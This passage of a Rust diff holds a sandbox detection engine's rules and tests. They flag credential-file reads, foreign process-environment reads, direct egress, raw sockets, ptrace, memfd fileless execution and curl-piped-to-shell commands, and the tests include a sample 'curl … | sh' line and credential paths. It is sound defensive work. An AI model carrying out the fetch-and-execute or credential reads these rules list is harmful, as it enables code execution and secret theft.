+        family: "mount",
+        severity: Severity::Notice,
+        title: "changed the mount table",
+        detail: "`mount` or `pivot_root`. Expected of a container runtime, unexpected of a \
+                 build, and the mechanism by which a filesystem grant is made to point \
+                 somewhere else.",
+    },
+];
+
+/// Look a rule up by id.
+pub fn rule(id: &str) -> Option<&'static RuleSpec> {
+    RULES.iter().find(|r| r.id == id)
+}
+
+/// Resolve a selector list — rule ids, family names, or `*` — into the set of
+/// rule ids it enables.
+///
+/// Unknown selectors are returned separately rather than ignored: a typo in a
+/// profile that silently disables a rule is exactly the kind of quiet failure
+/// this whole part of the product exists to avoid.
+pub fn select(selectors: &[String]) -> (HashSet<&'static str>, Vec<String>) {
+    let mut on: HashSet<&'static str> = HashSet::new();
+    let mut unknown = Vec::new();
+    for sel in selectors {
+        if sel == "*" {
+            on.extend(RULES.iter().map(|r| r.id));
+            continue;
+        }
+        if let Some(r) = rule(sel) {
+            on.insert(r.id);
+            continue;
+        }
+        let family: Vec<&'static str> = RULES
+            .iter()
+            .filter(|r| r.family == sel)
+            .map(|r| r.id)
+            .collect();
+        if family.is_empty() {
+            unknown.push(sel.clone());
+        } else {
+            on.extend(family);
+        }
+    }
+    (on, unknown)
+}
+
+/// What the engine needs to know about the box to judge an event.
+///
+/// All of it comes from the resolved policy and the box's own layout, so a
+/// detection is always relative to what *this* box was allowed, never to a
+/// global idea of suspicious.
+#[derive(Debug, Clone, Default)]
+pub struct RuleContext {
+    /// The profile's `net.mode`: `deny`, `proxy`, or `allow`.
+    pub net_mode: String,
+    /// Whether the profile granted `unix_sockets`.
+    pub unix_sockets: bool,
+    /// The box's workspace root, as the box sees it. A `.env` inside is the
+    /// project's; one outside is somebody else's.
+    pub workspace: String,
+    /// The home directory whose dotfiles the credential rules are about.
+    pub home: String,
+    /// The box's `.h5i` control directory.
+    pub control_dir: String,
+    /// Addresses the box is *supposed* to dial: the egress proxy's own
+    /// endpoints. Without these, every proxied request would be reported as
+    /// direct egress, which would make the loudest rule in the catalogue the
+    /// least believable one.
+    pub proxy_peers: Vec<String>,
+    /// Rule ids that are on. Empty means every rule.
+    pub enabled: HashSet<&'static str>,
+}
+
+impl RuleContext {
+    fn on(&self, id: &str) -> bool {
+        self.enabled.is_empty() || self.enabled.contains(id)
+    }
+}
+
+/// A rule's running total.
+#[derive(Debug, Clone)]
+struct Acc {
+    spec: &'static RuleSpec,
+    count: u64,
+    first_ns: u64,
+    last_ns: u64,
+    examples: Vec<String>,
+    truncated: bool,
+}
+
+/// The fold. Feed it events; ask it for detections.
+#[derive(Debug, Clone)]
+pub struct Engine {
+    ctx: RuleContext,
+    acc: BTreeMap<&'static str, Acc>,
+    /// Every tid and tgid the stream has mentioned. Used to tell "a process of
+    /// this box" from "a process of this host", which is what makes
+    /// `priv.ptrace` and `secret.proc-environ` mean anything.
+    known_pids: HashSet<u32>,
+    /// Processes that have called `memfd_create` and not yet execed, for
+    /// `exec.memfd`.
+    memfd_pending: HashSet<u32>,
+    /// Parent of each pid, learned from `Fork`. The probe cannot supply it
+    /// (ROADMAP.md D5), and lineage is what most of the interesting questions
+    /// are actually about.
+    parents: BTreeMap<u32, u32>,
+    seen: u64,
+}
+
+/// Credential paths, matched as a suffix against the home-relative part of an
+/// open. Suffixes rather than absolute paths because the box's home is not the
+/// host's, and a rule that hardcoded one would fire on neither.
+const CREDENTIAL_MARKERS: &[&str] = &[
+    "/.ssh/",
+    "/.aws/credentials",
+    "/.aws/config",
+    "/.config/gh/",
+    "/.git-credentials",
+    "/.netrc",
+    "/.kube/config",
+    "/.docker/config.json",
+    "/.npmrc",
+    "/.pypirc",
+    "/.gnupg/",
+    "/.config/gcloud/",
+    "/.config/h5i/",
+];
+
+const PACKAGE_MANAGERS: &[&str] = &[
+    "npm", "npx", "pnpm", "yarn", "pip", "pip3", "cargo", "gem", "go", "bundle", "poetry", "uv",
+    "composer", "maven", "gradle",
+];
+
+const SHELLS: &[&str] = &["sh", "bash", "zsh", "dash", "ash", "ksh"];
+
+const TMP_PREFIXES: &[&str] = &["/tmp/", "/var/tmp/", "/dev/shm/"];
+
+/// `SOCK_RAW`. `AF_PACKET` is 17.
+const SOCK_RAW: i64 = 3;
+const AF_PACKET: i64 = 17;
+/// `PTRACE_TRACEME`. A process asking to be traced is not attaching to
+/// anything, so it is not what the rule is about.
+const PTRACE_TRACEME: i64 = 0;
+
+impl Engine {
+    pub fn new(ctx: RuleContext) -> Self {
+        Self {
+            ctx,
+            acc: BTreeMap::new(),
+            known_pids: HashSet::new(),
+            memfd_pending: HashSet::new(),
+            parents: BTreeMap::new(),
+            seen: 0,
+        }
+    }
+
+    pub fn events_seen(&self) -> u64 {
+        self.seen
+    }
+
+    /// The parent of a pid, as far as the Fork events said. Used by the
+    /// session to fill `Event::ppid`, which the probe cannot.
+    pub fn parent_of(&self, pid: u32) -> Option<u32> {
+        self.parents.get(&pid).copied()
+    }
+
+    fn fire(&mut self, id: &'static str, ev: &Event, example: String) {
+        if !self.ctx.on(id) {
+            return;
+        }
+        let Some(spec) = rule(id) else { return };
+        let entry = self.acc.entry(id).or_insert_with(|| Acc {
+            spec,
+            count: 0,
+            first_ns: ev.ts_ns,
+            last_ns: ev.ts_ns,
+            examples: Vec::new(),
+            truncated: false,
+        });
+        entry.count += 1;
+        entry.first_ns = entry.first_ns.min(ev.ts_ns);
+        entry.last_ns = entry.last_ns.max(ev.ts_ns);
+        if entry.examples.len() < MAX_EXAMPLES {
+            let line = sanitize(&format!("{} [{}:{}]", example, ev.comm, ev.tgid));
+            if !entry.examples.contains(&line) {
+                entry.examples.push(line);
+            }
+        } else {
+            entry.truncated = true;
+        }
+    }
+
+    /// Fold one event in.
+    pub fn observe(&mut self, ev: &Event) {
+        self.seen += 1;
+        self.known_pids.insert(ev.tid);
+        self.known_pids.insert(ev.tgid);
+
+        match ev.kind {
+            EventKind::Fork => {
+                let child = u32::try_from(ev.a0).unwrap_or(0);
+                if child != 0 {
+                    self.known_pids.insert(child);
+                    self.parents.insert(child, ev.tid);
+                }
+            }
+            EventKind::Exit => {}
+            EventKind::Memfd => {
+                self.memfd_pending.insert(ev.tgid);
+            }
+            EventKind::Exec => self.on_exec(ev),
+            EventKind::Open => self.on_open(ev),
+            EventKind::Connect => self.on_connect(ev),
+            EventKind::Socket => self.on_socket(ev),
+            EventKind::Ptrace => self.on_ptrace(ev),
+            EventKind::Bpf => {
+                self.fire("kernel.bpf", ev, format!("bpf(cmd={})", ev.a0));
+            }
+            EventKind::Nsop => {
+                let verb = if ev.a1 == 0 { "unshare" } else { "setns" };
+                self.fire("priv.namespace", ev, format!("{verb}(flags={:#x})", ev.a0));
+            }
+            EventKind::Module => {
+                let verb = if ev.a0 == 0 {
+                    "init_module"
+                } else {
+                    "finit_module"
+                };
+                self.fire("kernel.module", ev, format!("{verb} {}", ev.path));
+            }
+            EventKind::Mount => {
+                let verb = if ev.a0 == 0 { "mount" } else { "pivot_root" };
+                self.fire("mount.change", ev, format!("{verb} {} <- {}", ev.path, ev.aux));
+            }
+            EventKind::Unknown(_) => {}
+        }
+    }
+
+    fn on_exec(&mut self, ev: &Event) {
+        let path = ev.path.clone();
+
+        // Fileless execution: the descriptor was made by this process and is
+        // now what it is running. Both halves are needed — a `/proc/self/fd/N`
+        // exec on its own is an ordinary way to run a downloaded script.
+        let is_fd_exec = path.starts_with("/proc/self/fd/")
+            || (path.starts_with("/proc/") && path.contains("/fd/"))
+            || path.starts_with("/memfd:");
+        if is_fd_exec && self.memfd_pending.contains(&ev.tgid) {
+            self.fire("exec.memfd", ev, format!("exec {path}"));
+        }
+        // Whatever it was, the pending memfd has been consumed.
+        self.memfd_pending.remove(&ev.tgid);
+
+        if TMP_PREFIXES.iter().any(|p| path.starts_with(p)) {
+            self.fire("exec.from-tmp", ev, format!("exec {path}"));
+        }
+
+        let base = basename(&path);
+        if PACKAGE_MANAGERS.contains(&base) {
+            self.fire("exec.package-manager", ev, ev.cmdline());
+        }
+        if SHELLS.contains(&base) && ev.aux == "-c" && looks_like_download_pipe(&ev.aux2) {
+            self.fire("exec.interpreter-pipe", ev, ev.cmdline());
+        }
+    }
+
+    fn on_open(&mut self, ev: &Event) {
+        let path = &ev.path;
+
+        if CREDENTIAL_MARKERS.iter().any(|m| path.contains(m)) {
+            self.fire("secret.read", ev, format!("open {path}"));
+        }
+
+        if is_dotenv(path) && !self.under(path, &self.ctx.workspace) {
+            self.fire("secret.dotenv", ev, format!("open {path}"));
+        }
+
+        if let Some(pid) = proc_environ_pid(path) {
+            // A box reading its own processes' environments is a box reading
+            // its own environment, which it already has.
+            if !self.known_pids.contains(&pid) {
+                self.fire(
+                    "secret.proc-environ",
+                    ev,
+                    format!("open /proc/{pid}/environ"),
+                );
+            }
+        }
+
+        if ev.write_intent() && self.under(path, &self.ctx.control_dir) {
+            self.fire("secret.h5i-state", ev, format!("write {path}"));
+        }
+    }
+
+    fn on_connect(&mut self, ev: &Event) {
+        let Some(family) = ev.family() else { return };
+        match family {
+            Family::Unix => {
+                if !self.ctx.unix_sockets {
+                    let peer = ev.peer.clone().unwrap_or_else(|| "<unnamed>".into());
+                    self.fire("net.unix-socket", ev, format!("connect unix {peer}"));
+                }
+            }
+            Family::Inet | Family::Inet6 => {
+                let Some(peer) = ev.peer.clone() else { return };
+                let port = ev.port().unwrap_or(0);
+                if port == 53 || port == 853 {
+                    self.fire("net.dns-direct", ev, format!("connect {peer}:{port}"));
+                }
+                let allowlisted = self.ctx.net_mode == "allow";
+                let expected = self.ctx.proxy_peers.iter().any(|p| p == &peer);
+                if !allowlisted && !expected && !is_local(&peer) {
+                    self.fire("net.direct-egress", ev, format!("connect {peer}:{port}"));
+                }
+            }
+            Family::Other(_) => {}
+        }
+    }
+
+    fn on_socket(&mut self, ev: &Event) {
+        // `type` carries flags (SOCK_CLOEXEC, SOCK_NONBLOCK) in its high bits.
+        let sock_type = ev.a1 & 0xf;
+        if sock_type == SOCK_RAW || ev.a0 == AF_PACKET {
+            self.fire(
+                "net.raw-socket",
+                ev,
+                format!("socket(family={}, type={}, proto={})", ev.a0, sock_type, ev.a2),
+            );
+        }
+    }
+
+    fn on_ptrace(&mut self, ev: &Event) {
+        if ev.a0 == PTRACE_TRACEME {
+            return;
+        }
+        let target = u32::try_from(ev.a1).unwrap_or(0);
+        if target != 0 && !self.known_pids.contains(&target) {
+            self.fire(
+                "priv.ptrace",
+                ev,
+                format!("ptrace(request={}, pid={target})", ev.a0),
+            );
+        }
+    }
+
+    /// Is `path` inside `root`? False when `root` is empty, which is what an
+    /// unconfigured context looks like — a rule must never fire on "everything
+    /// is inside nothing".
+    fn under(&self, path: &str, root: &str) -> bool {
+        if root.is_empty() {
+            return false;
+        }
+        let root = root.trim_end_matches('/');
+        path == root || path.starts_with(&format!("{root}/"))
+    }
+
+    /// Read the accumulator out, worst first, then by rule id so the order is
+    /// stable across runs and a diff of two receipts is readable.
+    pub fn finish(self) -> Vec<Detection> {
+        let mut out: Vec<Detection> = self
+            .acc
+            .into_values()
+            .map(|a| Detection {
+                rule: a.spec.id.to_string(),
+                family: a.spec.family.to_string(),
+                severity: a.spec.severity,
+                title: a.spec.title.to_string(),
+                count: a.count,
+                first_ns: a.first_ns,
+                last_ns: a.last_ns,
+                examples: a.examples,
+                examples_truncated: a.truncated,
+            })
+            .collect();
+        out.sort_by(|x, y| y.severity.cmp(&x.severity).then_with(|| x.rule.cmp(&y.rule)));
+        out
+    }
+}
+
+fn basename(path: &str) -> &str {
+    path.rsplit('/').next().unwrap_or(path)
+}
+
+fn is_dotenv(path: &str) -> bool {
+    let base = basename(path);
+    base == ".env" || base.starts_with(".env.")
+}
+
+/// `/proc/<pid>/environ`, and only that. `/proc/self/environ` is the process's
+/// own and is not a finding.
+fn proc_environ_pid(path: &str) -> Option<u32> {
+    let rest = path.strip_prefix("/proc/")?;
+    let (head, tail) = rest.split_once('/')?;
+    if tail != "environ" {
+        return None;
+    }
+    head.parse::<u32>().ok()
+}
+
+/// Loopback, link-local, and the unspecified address. Not "private": a box
+/// dialling `192.168.1.10` has reached the user's LAN, which is exactly the
+/// kind of egress the allowlist is about.
+fn is_local(peer: &str) -> bool {
+    if peer.starts_with("127.") || peer == "0.0.0.0" {
+        return true;
+    }
+    if peer.starts_with("169.254.") {
+        return true;
+    }
+    // IPv6, as this build renders it: eight colon-separated groups.
+    let v6_loopback = peer
+        .split(':')
+        .enumerate()
+        .all(|(i, g)| if i == 7 { g == "1" || g == "0" } else { g == "0" });
+    peer.contains(':') && v6_loopback
+}
+
+/// The download-and-pipe shape, as a shell writes it.
+fn looks_like_download_pipe(cmd: &str) -> bool {
+    let fetches = ["curl ", "wget ", "fetch ", "iwr ", "http "];
+    let sinks = ["| sh", "|sh", "| bash", "|bash", "| python", "|python", "| zsh", "|zsh"];
+    fetches.iter().any(|f| cmd.contains(f)) && sinks.iter().any(|s| cmd.contains(s))
+}
+
+/// Make an exemplar safe to print and bounded in size.
+///
+/// The string came out of a box. It reaches a terminal (the CLI), an HTML page
+/// (the console) and a git ref (the export), so the control sequences go
+/// first — the same treatment every other box-written string in h5i gets, via
+/// the same helper.
+fn sanitize(s: &str) -> String {
+    let cleaned = h5i_error::redact::sanitize_display(s);
+    if cleaned.len() <= MAX_EXAMPLE_LEN {
+        return cleaned;
+    }
+    let mut cut = MAX_EXAMPLE_LEN;
+    while cut > 0 && !cleaned.is_char_boundary(cut) {
+        cut -= 1;
+    }
+    format!("{}…", &cleaned[..cut])
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use crate::event::{AUX_HALF, AUX_LEN, EVENT_MAGIC, EVENT_VERSION, PATH_LEN, RawEvent};
+
+    /// Build an event without going near a kernel. Every test in this module
+    /// is a synthetic stream, which is the point: the rules are the layer that
+    /// can be held to account on a machine with no privileges at all.
+    fn ev(kind: EventKind, tgid: u32) -> Event {
+        Event {
+            kind,
+            ts_ns: 1_000,
+            tgid,
+            tid: tgid,
+            ppid: 0,
+            uid: 1000,
+            a0: 0,
+            a1: 0,
+            a2: 0,
+            comm: "test".into(),
+            path: String::new(),
+            aux: String::new(),
+            aux2: String::new(),
+            peer: None,
+        }
+    }
+
+    fn ctx() -> RuleContext {
+        RuleContext {
+            net_mode: "proxy".into(),
+            unix_sockets: false,
+            workspace: "/work".into(),
+            home: "/home/box".into(),
+            control_dir: "/work/.h5i".into(),
+            proxy_peers: vec!["10.0.2.2".into()],
+            enabled: HashSet::new(),
+        }
+    }
+
+    fn run(events: Vec<Event>) -> Vec<Detection> {
+        let mut e = Engine::new(ctx());
+        for x in &events {
+            e.observe(x);
+        }
+        e.finish()
+    }
+
+    fn fired(d: &[Detection], id: &str) -> bool {
+        d.iter().any(|x| x.rule == id)
+    }
+
+    // ------------------------------------------------------------- network
+
+    #[test]
+    fn a_direct_connection_out_is_an_alert() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 2;
+        c.a1 = 443;
+        c.peer = Some("93.184.216.34".into());
+        let d = run(vec![c]);
+        assert!(fired(&d, "net.direct-egress"));
+        assert_eq!(d[0].severity, Severity::Alert);
+    }
+
+    /// The proxy's own endpoint must be exempt, or the loudest rule in the
+    /// catalogue fires on every correctly-proxied request and stops meaning
+    /// anything.
+    #[test]
+    fn the_egress_proxy_itself_is_not_direct_egress() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 2;
+        c.a1 = 8080;
+        c.peer = Some("10.0.2.2".into());
+        assert!(!fired(&run(vec![c]), "net.direct-egress"));
+    }
+
+    #[test]
+    fn loopback_is_not_egress() {
+        for addr in ["127.0.0.1", "0:0:0:0:0:0:0:1"] {
+            let mut c = ev(EventKind::Connect, 10);
+            c.a0 = if addr.contains(':') { 10 } else { 2 };
+            c.a1 = 3000;
+            c.peer = Some(addr.into());
+            assert!(
+                !fired(&run(vec![c]), "net.direct-egress"),
+                "{addr} should be local"
+            );
+        }
+    }
+
+    /// A LAN address is *not* local for this purpose. Reaching the user's
+    /// router or NAS is exactly the egress an allowlist is about.
+    #[test]
+    fn a_lan_address_is_still_egress() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 2;
+        c.a1 = 445;
+        c.peer = Some("192.168.1.10".into());
+        assert!(fired(&run(vec![c]), "net.direct-egress"));
+    }
+
+    #[test]
+    fn an_unrestricted_box_is_not_reported_for_using_its_network() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 2;
+        c.a1 = 443;
+        c.peer = Some("93.184.216.34".into());
+        let mut cx = ctx();
+        cx.net_mode = "allow".into();
+        let mut e = Engine::new(cx);
+        e.observe(&c);
+        assert!(!fired(&e.finish(), "net.direct-egress"));
+    }
+
+    #[test]
+    fn dns_is_reported_separately_from_egress() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 2;
+        c.a1 = 53;
+        c.peer = Some("8.8.8.8".into());
+        let d = run(vec![c]);
+        assert!(fired(&d, "net.dns-direct"));
+        assert!(fired(&d, "net.direct-egress"));
+    }
+
+    #[test]
+    fn raw_and_packet_sockets_both_fire() {
+        let mut raw = ev(EventKind::Socket, 10);
+        raw.a0 = 2;
+        raw.a1 = SOCK_RAW;
+        assert!(fired(&run(vec![raw]), "net.raw-socket"));
+
+        let mut packet = ev(EventKind::Socket, 10);
+        packet.a0 = AF_PACKET;
+        packet.a1 = 2; // SOCK_DGRAM
+        assert!(fired(&run(vec![packet]), "net.raw-socket"));
+    }
+
+    /// `SOCK_CLOEXEC` and `SOCK_NONBLOCK` ride in the high bits of `type`. A
+    /// naive equality test misses every socket opened the way modern code
+    /// opens them.
+    #[test]
+    fn socket_type_flags_do_not_hide_a_raw_socket() {
+        let mut raw = ev(EventKind::Socket, 10);
+        raw.a0 = 2;
+        raw.a1 = SOCK_RAW | 0o2000000 | 0o4000; // CLOEXEC | NONBLOCK
+        assert!(fired(&run(vec![raw]), "net.raw-socket"));
+    }
+
+    #[test]
+    fn unix_sockets_fire_only_when_the_profile_did_not_grant_them() {
+        let mut c = ev(EventKind::Connect, 10);
+        c.a0 = 1;
+        c.peer = Some("@h5i.browser".into());
+        assert!(fired(&run(vec![c.clone()]), "net.unix-socket"));
+
+        let mut cx = ctx();
+        cx.unix_sockets = true;
+        let mut e = Engine::new(cx);
+        e.observe(&c);
+        assert!(!fired(&e.finish(), "net.unix-socket"));
+    }
+
+    // ------------------------------------------------------------- secrets
+
+    #[test]
+    fn credential_paths_fire() {
+        for p in [
+            "/home/box/.ssh/id_ed25519",
+            "/home/box/.aws/credentials",
+            "/root/.config/gh/hosts.yml",
+            "/home/box/.git-credentials",
+            "/home/box/.docker/config.json",
+        ] {
+            let mut o = ev(EventKind::Open, 10);
+            o.path = p.into();
+            assert!(fired(&run(vec![o]), "secret.read"), "{p}");
+        }
+    }
+
+    #[test]
+    fn an_ordinary_source_file_fires_nothing() {
+        let mut o = ev(EventKind::Open, 10);
+        o.path = "/work/src/main.rs".into();
+        assert!(run(vec![o]).is_empty());
+    }
+
+    #[test]
+    fn the_projects_own_dotenv_is_the_job_not_a_finding() {
+        let mut inside = ev(EventKind::Open, 10);
+        inside.path = "/work/.env".into();
+        assert!(!fired(&run(vec![inside]), "secret.dotenv"));
+
+        let mut outside = ev(EventKind::Open, 10);
+        outside.path = "/home/box/other-project/.env.production".into();
+        assert!(fired(&run(vec![outside]), "secret.dotenv"));
+    }
+
+    #[test]
+    fn reading_a_foreign_processs_environment_is_an_alert() {
+        let mut o = ev(EventKind::Open, 10);
+        o.path = "/proc/4242/environ".into();
+        assert!(fired(&run(vec![o]), "secret.proc-environ"));
+    }
+
+    /// A box reading the environment of its *own* process learns nothing it
+    /// did not already have. Firing there would bury the case that matters.
+    #[test]
+    fn reading_its_own_processs_environment_is_not() {
+        let mut o = ev(EventKind::Open, 10);
+        o.path = "/proc/10/environ".into();
+        assert!(!fired(&run(vec![o]), "secret.proc-environ"));
+
+        let mut own = ev(EventKind::Open, 10);
+        own.path = "/proc/self/environ".into();
+        assert!(!fired(&run(vec![own]), "secret.proc-environ"));
+    }
+
+    #[test]
+    fn writing_h5is_control_directory_is_an_alert_but_reading_it_is_not() {
+        let mut w = ev(EventKind::Open, 10);
+        w.path = "/work/.h5i/env.toml".into();
+        w.a1 = 1; // write intent
+        assert!(fired(&run(vec![w]), "secret.h5i-state"));
+
+        let mut r = ev(EventKind::Open, 10);
+        r.path = "/work/.h5i/env.toml".into();
+        assert!(!fired(&run(vec![r]), "secret.h5i-state"));
+    }
+
+    /// An unconfigured context must not turn every path into a match. The
+    /// naive `starts_with("")` is true for every string on earth.
+    #[test]
+    fn an_empty_root_matches_nothing() {
+        let mut w = ev(EventKind::Open, 10);
+        w.path = "/etc/passwd".into();
+        w.a1 = 1;
+        let mut cx = ctx();
+        cx.control_dir = String::new();
+        cx.workspace = String::new();
+        let mut e = Engine::new(cx);
+        e.observe(&w);
+        assert!(!fired(&e.finish(), "secret.h5i-state"));
+    }
+
+    /// `/work/.h5i-notes` is not inside `/work/.h5i`.
+    #[test]
+    fn a_sibling_with_a_shared_prefix_is_not_inside() {
+        let mut w = ev(EventKind::Open, 10);
+        w.path = "/work/.h5i-notes/scratch".into();
+        w.a1 = 1;
+        assert!(!fired(&run(vec![w]), "secret.h5i-state"));
+    }
+
+    // ---------------------------------------------------------- execution
+
+    #[test]
+    fn fileless_execution_needs_both_halves() {
+        let memfd = ev(EventKind::Memfd, 10);
+        let mut exec = ev(EventKind::Exec, 10);
+        exec.path = "/proc/self/fd/3".into();
+        assert!(fired(&run(vec![memfd, exec.clone()]), "exec.memfd"));
+
+        // The exec alone is an ordinary way to run a downloaded script.
+        assert!(!fired(&run(vec![exec]), "exec.memfd"));
+    }
+
+    /// The pending memfd belongs to the process that created it. Another
+    /// process's exec must not consume it.
+    #[test]
+    fn a_memfd_does_not_arm_a_different_process() {
+        let memfd = ev(EventKind::Memfd, 10);
+        let mut exec = ev(EventKind::Exec, 11);
+        exec.path = "/proc/self/fd/3".into();
+        assert!(!fired(&run(vec![memfd, exec]), "exec.memfd"));
+    }
+
+    #[test]
+    fn execution_from_tmp_fires() {
+        let mut e = ev(EventKind::Exec, 10);
+        e.path = "/tmp/.build-helper".into();
+        assert!(fired(&run(vec![e]), "exec.from-tmp"));
+    }
+
+    #[test]
+    fn package_managers_are_recorded_at_info() {
+        let mut e = ev(EventKind::Exec, 10);
+        e.path = "/usr/bin/npm".into();
+        e.aux = "ci".into();
+        let d = run(vec![e]);
+        assert!(fired(&d, "exec.package-manager"));
+        assert_eq!(d[0].severity, Severity::Info);
+    }
+
+    #[test]
+    fn curl_piped_into_a_shell_fires() {
+        let mut e = ev(EventKind::Exec, 10);
+        e.path = "/bin/sh".into();
+        e.aux = "-c".into();
+        e.aux2 = "curl -fsSL https://example.com/i.sh | sh".into();
+        assert!(fired(&run(vec![e]), "exec.interpreter-pipe"));
+    }
+
+    #[test]
+    fn an_ordinary_shell_command_does_not() {
+        let mut e = ev(EventKind::Exec, 10);
+        e.path = "/bin/sh".into();
+        e.aux = "-c".into();
+        e.aux2 = "cargo test --all".into();
+        assert!(!fired(&run(vec![e]), "exec.interpreter-pipe"));
+    }
+
+    // ---------------------------------------------------------- privilege
+
+    #[test]
+    fn ptrace_of_a_host_process_fires_and_of_our_own_does_not() {
+        let mut foreign = ev(EventKind::Ptrace, 10);
+        foreign.a0 = 16; // PTRACE_ATTACH
+        foreign.a1 = 9999;
+        assert!(fired(&run(vec![foreign]), "priv.ptrace"));
+
+        let mut sibling = ev(EventKind::Ptrace, 10);
+        sibling.a0 = 16;
+        sibling.a1 = 10;
+        assert!(!fired(&run(vec![sibling]), "priv.ptrace"));
+    }
+
+    /// A process asking to be traced (a debugger's own child, a crash handler)
+    /// is not attaching to anybody.
+    #[test]
+    fn ptrace_traceme_is_not_an_attach() {
+        let mut me = ev(EventKind::Ptrace, 10);
+        me.a0 = PTRACE_TRACEME;
+        me.a1 = 0;
+        assert!(!fired(&run(vec![me]), "priv.ptrace"));
+    }
+
+    /// A pid learned from a Fork counts as ours even though it never raised an
+    /// event of its own.
+    #[test]
+    fn fork_teaches_the_engine_which_pids_are_ours() {
+        let mut fork = ev(EventKind::Fork, 10);
+        fork.a0 = 77;
+        let mut trace = ev(EventKind::Ptrace, 10);
+        trace.a0 = 16;
+        trace.a1 = 77;
+        assert!(!fired(&run(vec![fork, trace]), "priv.ptrace"));
+    }
+
+    #[test]
+    fn lineage_is_reconstructed_from_forks() {
+        let mut fork = ev(EventKind::Fork, 10);
+        fork.a0 = 77;
+        let mut e = Engine::new(ctx());
+        e.observe(&fork);
+        assert_eq!(e.parent_of(77), Some(10));
+        assert_eq!(e.parent_of(78), None);
+    }
+
+    #[test]
+    fn kernel_facilities_fire() {
+        assert!(fired(&run(vec![ev(EventKind::Bpf, 10)]), "kernel.bpf"));
+        assert!(fired(&run(vec![ev(EventKind::Module, 10)]), "kernel.module"));
+        assert!(fired(&run(vec![ev(EventKind::Nsop, 10)]), "priv.namespace"));
+        assert!(fired(&run(vec![ev(EventKind::Mount, 10)]), "mount.change"));
+    }
+
+    // ------------------------------------------------------- folding & io
+
+    #[test]
+    fn repeats_fold_into_one_detection_with_a_count() {
+        let mut events = Vec::new();
+        for i in 0..400 {
+            let mut o = ev(EventKind::Open, 10);
+            o.ts_ns = 1000 + i;
+            o.path = format!("/home/box/.ssh/key{i}");
+            events.push(o);
+        }
+        let d = run(events);
+        assert_eq!(d.len(), 1);
+        assert_eq!(d[0].count, 400);
+        assert_eq!(d[0].examples.len(), MAX_EXAMPLES);
+        assert!(d[0].examples_truncated);
+        assert_eq!(d[0].first_ns, 1000);
+        assert_eq!(d[0].last_ns, 1399);
+    }
+
+    #[test]
+    fn detections_come_out_worst_first() {
+        let mut pm = ev(EventKind::Exec, 10);
+        pm.path = "/usr/bin/npm".into();
+        let mut cred = ev(EventKind::Open, 10);
+        cred.path = "/home/box/.ssh/id_rsa".into();
+        let d = run(vec![pm, cred]);
+        assert_eq!(d[0].severity, Severity::Alert);
+        assert_eq!(d[1].severity, Severity::Info);
+    }
+
+    /// An exemplar is a string a box chose. It reaches a terminal, an HTML
+    /// page and a git ref, so an escape sequence in it must not survive.
+    #[test]
+    fn exemplars_are_stripped_of_control_sequences_and_bounded() {
+        let mut o = ev(EventKind::Open, 10);
+        o.path = format!("/home/box/.ssh/\x1b[2J{}", "A".repeat(500));
+        let d = run(vec![o]);
+        let ex = &d[0].examples[0];
+        assert!(!ex.contains('\x1b'), "{ex}");
+        assert!(ex.len() <= MAX_EXAMPLE_LEN + 4, "{}", ex.len());
+    }
+
+    // ------------------------------------------------------------ config
+
+    #[test]
+    fn selectors_resolve_ids_families_and_star() {
+        let (all, unknown) = select(&["*".into()]);
+        assert_eq!(all.len(), RULES.len());
+        assert!(unknown.is_empty());
+
+        let (net, _) = select(&["net".into()]);
+        assert_eq!(net.len(), RULES.iter().filter(|r| r.family == "net").count());
+
+        let (one, _) = select(&["kernel.bpf".into()]);
+        assert_eq!(one.len(), 1);
+    }
+
+    /// A typo must be reported, not silently swallowed. A profile that thinks
+    /// it enabled a rule and did not is the exact failure this lane exists to
+    /// stop happening elsewhere.
+    #[test]
+    fn an_unknown_selector_is_reported() {
+        let (on, unknown) = select(&["net.direct-egres".into()]);
+        assert!(on.is_empty());
+        assert_eq!(unknown, vec!["net.direct-egres".to_string()]);
+    }
+
+    #[test]
+    fn a_disabled_rule_does_not_fire() {
+        let mut cx = ctx();
+        cx.enabled = select(&["net".into()]).0;
+        let mut e = Engine::new(cx);
+        let mut o = ev(EventKind::Open, 10);
+        o.path = "/home/box/.ssh/id_rsa".into();
+        e.observe(&o);
+        assert!(e.finish().is_empty());
+    }
+
+    // ----------------------------------------------------------- catalogue
+
+    /// Every rule in the table must be reachable from `observe`. A row nobody
+    /// implements is a promise in `detect rules` that the detector does not
+    /// keep.
+    #[test]
+    fn every_listed_rule_can_actually_fire() {
+        let unreachable: Vec<&str> = RULES
+            .iter()
+            .map(|r| r.id)
+            .filter(|id| !fires_somewhere(id))
+            .collect();
+        assert!(unreachable.is_empty(), "listed but never fired: {unreachable:?}");
+    }
+
+    /// Drive one rule with the stream that should trip it.
+    fn fires_somewhere(id: &str) -> bool {
+        let d = match id {
+            "net.direct-egress" | "net.dns-direct" => {
+                let mut c = ev(EventKind::Connect, 10);
+                c.a0 = 2;
+                c.a1 = if id == "net.dns-direct" { 53 } else { 443 };
+                c.peer = Some("8.8.8.8".into());
+                run(vec![c])
+            }
+            "net.raw-socket" => {
+                let mut s = ev(EventKind::Socket, 10);
+                s.a0 = 2;
+                s.a1 = SOCK_RAW;
+                run(vec![s])
+            }
+            "net.unix-socket" => {
+                let mut c = ev(EventKind::Connect, 10);
+                c.a0 = 1;
+                c.peer = Some("@x".into());
+                run(vec![c])
+            }
+            "secret.read" => {
+                let mut o = ev(EventKind::Open, 10);
+                o.path = "/home/box/.ssh/id_rsa".into();
+                run(vec![o])
+            }
+            "secret.dotenv" => {
+                let mut o = ev(EventKind::Open, 10);
+                o.path = "/elsewhere/.env".into();
+                run(vec![o])
+            }
+            "secret.proc-environ" => {
+                let mut o = ev(EventKind::Open, 10);
+                o.path = "/proc/4242/environ".into();
+                run(vec![o])
+            }
+            "secret.h5i-state" => {
+                let mut o = ev(EventKind::Open, 10);
+                o.path = "/work/.h5i/manifest.json".into();
+                o.a1 = 1;
+                run(vec![o])
+            }
+            "exec.from-tmp" => {
+                let mut e = ev(EventKind::Exec, 10);
+                e.path = "/tmp/x".into();
+                run(vec![e])
+            }
+            "exec.memfd" => {
+                let mut e = ev(EventKind::Exec, 10);
+                e.path = "/proc/self/fd/3".into();
+                run(vec![ev(EventKind::Memfd, 10), e])
+            }
